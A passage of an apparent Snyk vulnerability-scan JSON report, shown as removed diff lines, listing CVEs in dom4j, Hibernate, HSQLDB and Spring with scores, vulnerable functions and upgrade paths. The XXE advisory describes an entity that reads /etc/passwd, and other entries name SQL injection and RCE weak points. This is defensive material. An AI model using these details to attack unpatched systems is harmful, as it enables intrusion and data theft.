contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/a822852)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1694235)\n", - "epssDetails": { - "percentile": "0.79800", - "probability": "0.00664", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10683" - ], - "CWE": [ - "CWE-611" - ], - "GHSA": [ - "GHSA-hwj3-m3p6-hj38" - ] - }, - "packageName": "dom4j:dom4j", - "proprietary": false, - "creationTime": "2022-05-10T12:56:27.582369Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2020-04-15T09:38:17Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "dom4j", - "artifactId": "dom4j" - }, - "publicationTime": "2020-04-16T15:22:50Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:57.985080Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "dom4j:dom4j@1.6.1" - ], - "upgradePath": [ - false, - "org.hibernate:hibernate-core@5.1.17.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "dom4j:dom4j", - "version": "1.6.1" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-1041788", - "title": "SQL Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,5.4.24.Final)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "5.4.24.Final" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" - }, - "language": "java", - "severity": "high", - "cvssScore": 8.2, - "functions": [ - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/loader/plan/exec/query/internal/SelectStatementBuilder.java", - "className": "SelectStatementBuilder", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Delete.java", - "className": "Delete", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Insert.java", - "className": "Insert", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/InsertSelect.java", - "className": "InsertSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/QuerySelect.java", - "className": "QuerySelect", - "functionName": "toQueryString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Select.java", - "className": "Select", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/SimpleSelect.java", - "className": "SimpleSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Update.java", - "className": "Update", - "functionName": "toStatementString" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-core", - "references": [ - { - "url": "https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78", - "title": "GitHub Commit" - }, - { - "url": "https://access.redhat.com/security/cve/cve-2020-25638", - "title": "Redhat CVE Details" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "cvssV3BaseScore": 7.4, - "modificationTime": "2024-03-11T09:50:47.602540Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "cvssV3BaseScore": 7.4, - "modificationTime": "2024-03-11T09:53:47.086548Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.2, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:14.190706Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:47.602540Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:47.086548Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.4.24.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78)\n- [Redhat CVE Details](https://access.redhat.com/security/cve/cve-2020-25638)\n", - "epssDetails": { - "percentile": "0.72103", - "probability": "0.00352", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-25638" - ], - "CWE": [ - "CWE-89" - ] - }, - "packageName": "org.hibernate:hibernate-core", - "proprietary": false, - "creationTime": "2020-11-19T16:51:52.251545Z", - "functions_new": [ - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.loader.plan.exec.query.internal.SelectStatementBuilder", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Delete", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Insert", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.InsertSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.QuerySelect", - "functionName": "toQueryString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Select", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.SimpleSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Update", - "functionName": "toStatementString" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-11-19T16:51:45Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-core" - }, - "publicationTime": "2020-11-19T16:57:14.572204Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:47.086548Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [ - false, - "org.hibernate:hibernate-core@5.4.24.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-584563", - "title": "SQL Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Gail Badner" - ], - "semver": { - "vulnerable": [ - "[,5.3.18.Final)", - "[5.4.0.Final, 5.4.18.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.3.18.Final", - "5.4.18.Final" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[5.1.18.Final ,5.4.18.Final)" - ], - "functionId": { - "filePath": "org/hibernate/query/criteria/internal/expression/LiteralExpression.java", - "className": "LiteralExpression", - "functionName": "renderProjection" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-core", - "references": [ - { - "url": "https://github.com/hibernate/hibernate-orm/pull/3438", - "title": "GitHub Pull Request" - }, - { - "url": "https://hibernate.atlassian.net/browse/HHH-14077", - "title": "Jira Ticket" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:51:28.265729Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:53:49.262550Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:47.723462Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:28.265729Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:49.262550Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.3.18.Final, 5.4.18.Final or higher.\n## References\n- [GitHub Pull Request](https://github.com/hibernate/hibernate-orm/pull/3438)\n- [Jira Ticket](https://hibernate.atlassian.net/browse/HHH-14077)\n", - "epssDetails": { - "percentile": "0.42797", - "probability": "0.00104", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14900" - ], - "CWE": [ - "CWE-89" - ] - }, - "packageName": "org.hibernate:hibernate-core", - "proprietary": false, - "creationTime": "2020-07-15T13:53:15.331818Z", - "functions_new": [ - { - "version": [ - "[5.1.18.Final ,5.4.18.Final)" - ], - "functionId": { - "className": "org.hibernate.query.criteria.internal.expression.LiteralExpression", - "functionName": "renderProjection" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-06-18T13:46:30Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-core" - }, - "publicationTime": "2020-07-15T16:40:12Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:49.262550Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [ - false, - "org.hibernate:hibernate-core@5.3.18.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final" - }, - { - "id": "snyk:lic:maven:org.hibernate:hibernate-core:LGPL-2.0", - "type": "license", - "title": "LGPL-2.0 license", - "semver": { - "vulnerable": [ - "[3.3.0.CR1, 5.3.1.Final)" - ] - }, - "license": "LGPL-2.0", - "language": "java", - "description": "LGPL-2.0 license", - "packageName": "org.hibernate:hibernate-core", - "creationTime": "2024-06-18T19:09:16.096Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T19:09:16.096Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final" - }, - { - "id": "SNYK-JAVA-ORGHSQLDB-3040860", - "title": "Remote Code Execution (RCE)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", - "credit": [ - "OSS Fuzz Team" - ], - "semver": { - "vulnerable": [ - "[,2.7.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.7.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hsqldb:hsqldb", - "references": [ - { - "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212%23c7", - "title": "Chromium Bugs" - }, - { - "url": "https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941", - "title": "GitHub Commit" - }, - { - "url": "http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html%23src_jrt_access_control", - "title": "Mitigation" - }, - { - "url": "https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java", - "title": "SVN Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:51:53.988304Z" - }, - { - "assigner": "Red Hat", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:53:59.414572Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:05:55.045961Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:53.988304Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:59.414572Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) when using `java.sql.Statement` or `java.sql.PreparedStatement` to process untrusted input. By default, it is allowed to call any static method of any Java class in the classpath resulting in code execution.\n\n## Workaround\nUsers who are unable to upgrade to the fixed version can set the system property `hsqldb.method_class_names` to classes which are allowed to be called. For example, `System.setProperty(\"hsqldb.method_class_names\", \"abc\")` or Java argument `-Dhsqldb.method_class_names=\"abc\"` can be used.\n## Remediation\nUpgrade `org.hsqldb:hsqldb` to version 2.7.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212#c7)\n- [GitHub Commit](https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941)\n- [Mitigation](http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html#src_jrt_access_control)\n- [SVN Commit](https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java)\n", - "epssDetails": { - "percentile": "0.85801", - "probability": "0.01274", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-41853" - ], - "CWE": [ - "CWE-94" - ], - "GHSA": [ - "GHSA-77xx-rxvh-q682" - ] - }, - "packageName": "org.hsqldb:hsqldb", - "proprietary": false, - "creationTime": "2022-10-07T07:26:42.276748Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-10-06T18:52:05Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hsqldb", - "artifactId": "hsqldb" - }, - "publicationTime": "2022-10-07T07:26:42.515068Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:59.414572Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hsqldb:hsqldb@2.3.2" - ], - "upgradePath": [ - false, - "org.hsqldb:hsqldb@2.7.1" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.hsqldb:hsqldb", - "version": "2.3.2" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", - "title": "Improper Output Neutralization for Logs", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "credit": [ - "Dennis Kennedy" - ], - "semver": { - "vulnerable": [ - "[5.3.0,5.3.12)", - "[,5.2.18)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.3.12", - "5.2.18" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 4.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-core", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5", - "title": "Github Commit" - }, - { - "url": "https://pivotal.io/security/cve-2021-22096", - "title": "Pivotal Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:48:36.610042Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:53:48.086414Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:05:20.847607Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:36.610042Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:48.086414Z" - } - ], - "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Output Neutralization for Logs when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.3.12, 5.2.18 or higher.\n## References\n- [Github Commit](https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22096)\n", - "epssDetails": { - "percentile": "0.34533", - "probability": "0.00079", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-22096" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.springframework:spring-core", - "proprietary": false, - "creationTime": "2022-01-02T11:14:46.053186Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2021-10-27T12:52:59Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-core" - }, - "publicationTime": "2021-10-27T16:55:13Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:48.086414Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-context@5.2.18.RELEASE", - "org.springframework:spring-core@5.2.18.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-core", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", - "title": "Improper Input Validation", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "credit": [ - "psytester" - ], - "semver": { - "vulnerable": [ - "[,5.2.19.RELEASE)", - "[5.3.0,5.3.14)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.19.RELEASE", - "5.3.14" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 4.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-core", - "references": [ - { - "url": "https://pivotal.io/security/cve-2021-22060", - "title": "Pivotal Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:48:34.544783Z" - }, - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:49:10.667113Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:24.703024Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:34.544783Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:10.667113Z" - } - ], - "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Input Validation when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.2.19.RELEASE, 5.3.14 or higher.\n## References\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22060)\n", - "epssDetails": { - "percentile": "0.23203", - "probability": "0.00054", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-22060" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.springframework:spring-core", - "proprietary": false, - "creationTime": "2022-01-06T12:31:26.181234Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-01-06T11:18:34Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-core" - }, - "publicationTime": "2022-01-06T17:17:24.995166Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:49:10.667113Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-context@5.2.19.RELEASE", - "org.springframework:spring-core@5.2.19.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-core", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-31325", - "title": "Directory Traversal", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "credit": [ - "Takeshi Terada" - ], - "semver": { - "vulnerable": [ - "[3.0.0.RELEASE, 3.2.9.RELEASE)", - "[4.0.0.RELEASE, 4.0.5.RELEASE)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "3.2.9.RELEASE", - "4.0.5.RELEASE" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [ - { - "version": [ - "[3.0.0.RELEASE, 3.2.9.RELEASE)", - "[4.0.0.RELEASE, 4.0.5.RELEASE)" - ], - "functionId": { - "filePath": "org/springframework/util/StringUtils.java", - "className": "StringUtils", - "functionName": "cleanPath" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-core", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/issues/16414", - "title": "GitHub Issue" - }, - { - "url": "https://jira.spring.io/browse/SPR-12354", - "title": "Jira Issue" - }, - { - "url": "http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html", - "title": "JVNDB" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578", - "title": "NVD" - }, - { - "url": "https://pivotal.io/security/cve-2014-3578", - "title": "Pivotal Security" - }, - { - "url": "http://www.pivotal.io/security/cve-2014-3578", - "title": "Pivotal Security" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1131882", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:46:07.314890Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:25.325641Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - 